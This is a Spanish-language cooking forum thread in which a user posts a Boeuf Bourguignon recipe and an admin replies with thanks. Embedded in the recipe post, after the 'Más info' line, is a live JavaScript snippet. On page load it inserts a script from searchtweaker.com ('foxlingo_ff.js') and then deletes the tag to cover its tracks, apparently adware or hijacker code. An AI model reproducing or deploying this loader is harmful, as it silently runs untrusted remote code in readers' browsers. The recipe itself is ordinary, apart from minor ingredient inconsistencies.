Ajenos
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

Boeuf Bourguignon [cocina francesa]

2 participantes

Ir abajo

chef Boeuf Bourguignon [cocina francesa]

Mensaje por Lilith Jue 03 Abr 2014, 12:27

[Tienes que estar registrado y conectado para ver esa imagen]

Ingredientes (4 personas):


  • 1/2 kg de carne de vacuno para guisar
  • 100 gr de bacon
  • 1 cebolla
  • 2 zanahorias
  • 1 rama de apio
  • 1 puerro
  • 3 dientes de ajo
  • 200 gr de champiñones
  • 1 zanahoria
  • 12 cebollitas francesas
  • 1 nabo
  • 1 cucharadita de concentrado de tomate
  • 3 cucharadas de harina
  • 1 botella de vino francés de Borgoña
  • mantequilla
  • sal
  • pimienta
  • 1 ramita de tomillo fresco


Elaboración de la receta de Boeuf Bourguignon:

Pon a calentar el vino en una tartera hasta que reduzca un cuarto y deja que se atempere.
Pica el apio, mézclalo con la carne en un bol y agrega unas ramas de tomillo y romero. Riega la carne con el vino, tapa con papel transparente y deja macerar de un día a otro.
Funde un trozo de mantequilla en una cazuela, escurre la carne con la ayuda de un colador y sécalo con un paño para que no tenga demasiada agua. Dóralo en la cazuela.
Cuela la marinada e introduce las verduras a la cazuela. Añade un trozo de mantequilla y dos cucharadas de harina y mezcla bien el conjunto. Cocínalo durante 2 minutos.
Vierte la marinada y un poco más de agua a la cazuela, salpimiéntalo y agrega una cucharada de pasta de tomate. Deja que se cocine el conjunto a fuego medio durante 1 hora y media.
Trocea los champiñones y la tocineta y saltea todo en un sartén acompañado de un trozo de mantequilla. Salpimienta.
Trocea las cebolletas, las zanahorias y el nabo y saltéalos en otra cazuela. Mezcla los salteados con la carne, rehoga bien y termina con un poco de perejil picado.

Más info: [Tienes que estar registrado y conectado para ver este vínculo]
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Lilith
Lilith
Ajen@


Volver arriba Ir abajo

chef Re: Boeuf Bourguignon [cocina francesa]

Mensaje por paraca Jue 03 Abr 2014, 16:56

habra que probarlo, gracias
paraca
paraca
Admin


Volver arriba Ir abajo

Volver arriba

- Temas similares

 
Permisos de este foro:
No puedes responder a temas en este foro.